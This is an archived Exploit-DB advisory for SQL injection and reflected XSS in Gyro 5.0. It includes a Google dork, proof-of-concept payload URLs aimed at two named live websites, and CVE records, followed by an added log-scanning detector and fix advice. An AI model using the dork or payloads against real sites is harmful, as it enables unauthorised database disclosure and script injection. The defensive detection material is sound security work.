ID EDB-ID:9640
Type exploitdb
Reporter OoN_Boy
Modified 2009-09-11T00:00:00
Description
Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-3348, CVE-2009-3349. Webapps exploit for the PHP platform.
[+]=================================================================[+]
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||n |||t |||i |||S |||c |||e |||r |||u |||t |||i |||y ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
------------------------------------------------------------
http://antisecurity.org
[+]=================================================================[+]
[x]Title : Gyro V5.0 [Sql/Xss] Multiple Remote Vulnerabilities
[x]Software : Gyro V5.0
[x]Vendor : http://www.datavore.com
[x]Date : 11 September 2009 ( Indonesia )
[x]Author : OoN_Boy
[x]Contact : oon.boy9@gmail.com
[x]Blog : http://oonboy.blogspot.com
[x]Website : http://oonboy.info
[+]=================================================================[+]
[x] Google Dork
"powered by Gyro V5.0"
[+]=================================================================[+]
[x] Exploit
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]
[x] Proof of concept
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"><script>alert(123456)</script>
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"><script>alert(123456)</script>
[+]=================================================================[+]
[x] Greetz
Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
[+]=================================================================[+]
[x] Wew
[03:49] <&OoN_Boy> ============================
[03:49] <&OoN_Boy> [03:48] <&chawanua> just because you're going out with noge now ..
[03:49] <&OoN_Boy> [03:48] <&Jack> xixixi
[03:49] <&OoN_Boy> [03:48] <&Jack> sorry sorry
[03:49] <&OoN_Boy> [03:48] <&Jack> :D
[03:49] <&OoN_Boy> [03:48] <&chawanua> why did you leave bob behind
[03:49] <&OoN_Boy> [03:49] <&Jack> I'm gay, and so are you
[03:49] <&OoN_Boy> ============================
[+]=================================================================[+]
---------=== Don't Sulk, Jack ===---------
# milw0rm.com [2009-09-11]
Published 2009-09-11T00:00:00
Title gyro 5.0 sql/XSS Multiple Vulnerabilities
CVSS 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
CVE CVE-2009-3349, CVE-2009-3348
OSVDB 58359, 58360
Href https://www.exploit-db.com/exploits/9640/
Source https://www.exploit-db.com/download/9640/
Last seen 2016-02-01T11:02:54
Related CVE records

CVE-2009-3349 (published 2009-09-24T12:30:01, CVSS 7.5, AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
SQL injection vulnerability in Datavore Gyro 5.0 allows remote attackers to execute arbitrary SQL commands via the cid parameter in a cat action to the home component.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3349

CVE-2009-3348 (published 2009-09-24T12:30:01, CVSS 4.3, AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/)
Cross-site scripting (XSS) vulnerability in Datavore Gyro 5.0 allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a cat action to the home component.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3348
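Both CVEs come down to one fact: `cid` in a `op=cat` request to `home` is supposed to be a numeric category id, and anything else reaching the application is either a probe or a bug. The detection script below is an added example, not part of the original advisory or of Gyro; it runs over a few constructed Apache combined-format access-log lines (not real traffic) and flags every `op=cat` request whose `cid` is not a plain integer, so it catches the two patterns shown in the proof of concept and also any other non-numeric value. It assumes the log format shown in the sample and that raw quote characters in the request target are percent-encoded, as they are in the constructed lines; a production log parser would need to handle the `\"` escaping Apache applies instead.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
# The XSS request has its '"' and '<' '>' percent-encoded so the line stays parseable.
SAMPLE_LOG = r'''
203.0.113.5 - - [11/Sep/2009:03:49:01 +0700] "GET /home?op=cat&cid=29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Sep/2009:03:49:07 +0700] "GET /home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Sep/2009:03:49:12 +0700] "GET /home?op=cat&cid=29%22%3E%3Cscript%3Ealert(123456)%3C/script%3E HTTP/1.1" 200 5180 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Sep/2009:03:50:00 +0700] "GET /home?op=view&id=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Sep/2009:03:50:30 +0700] "GET /home?op=cat&cid=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristics used only to label a finding; the primary rule is "cid must be an integer".
SQL_HINT = re.compile(r'\b(union|select|sleep|benchmark)\b|--|/\*', re.I)
HTML_HINT = re.compile(r'<[a-z/!]|javascript:', re.I)


def classify_cid(value):
    """Return None when cid is the integer the application expects, else a reason label.

    `value` is the already URL-decoded parameter value.
    """
    if re.fullmatch(r'\d+', value):
        return None
    if SQL_HINT.search(value):
        return 'sql-injection-pattern'
    if HTML_HINT.search(value):
        return 'xss-pattern'
    return 'non-numeric-cid'


def scan_log(text):
    """Scan log text and return one finding per op=cat request with a suspicious cid."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected format; skip rather than guess
        parts = urlsplit(m.group('target'))
        if parts.path != '/home':
            continue
        # parse_qs decodes percent-escapes and turns '+' into spaces, matching what the app sees.
        params = parse_qs(parts.query, keep_blank_values=True)
        if params.get('op') != ['cat']:
            continue
        for cid in params.get('cid', ['']):
            reason = classify_cid(cid)
            if reason:
                findings.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'cid': cid,
                    'reason': reason,
                })
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same allow-list rule (`cid` must match `\d+`) is also the server-side fix: casting or validating `cid` as an integer before it reaches the query removes the injection, and escaping it on output removes the reflected XSS, independently of whatever keyword heuristics a WAF or log monitor applies.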